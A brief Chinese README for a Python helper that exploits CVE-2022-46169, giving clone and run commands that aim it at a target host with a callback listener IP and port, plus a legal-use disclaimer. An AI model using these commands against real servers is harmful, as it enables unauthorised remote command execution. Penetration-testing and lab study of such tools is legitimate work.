此 Python 脚本是一个辅助工具,旨在简化利用 CVE-2022-46169 漏洞的过程。它启动一个 HTTP 服务器监听传入请求,并为用户提供一个简单的界面来输入命令。这些命令随后在目标服务器上执行,自动化了向易受攻击的服务器发送精心构造的载荷并实时观察服务器响应的过程。
通过利用此脚本,用户可自动向易受攻击的服务器发送精心构造的载荷,并实时查看服务器的响应。
git clone [email protected]:ahanel13/ImprovedShell-for-CVE-2022-46169.git
cd ImprovedShell-for-CVE-2022-46169
python CVE-2022-46169_helper.py -h
python3 CVE-2022-46169_helper.py --target http://10.10.11.211 --ip 10.10.14.86 --port 5000

此脚本仅用于教育目的和合法用途。在执行任何类型的渗透测试或安全评估之前,请务必获得适当授权。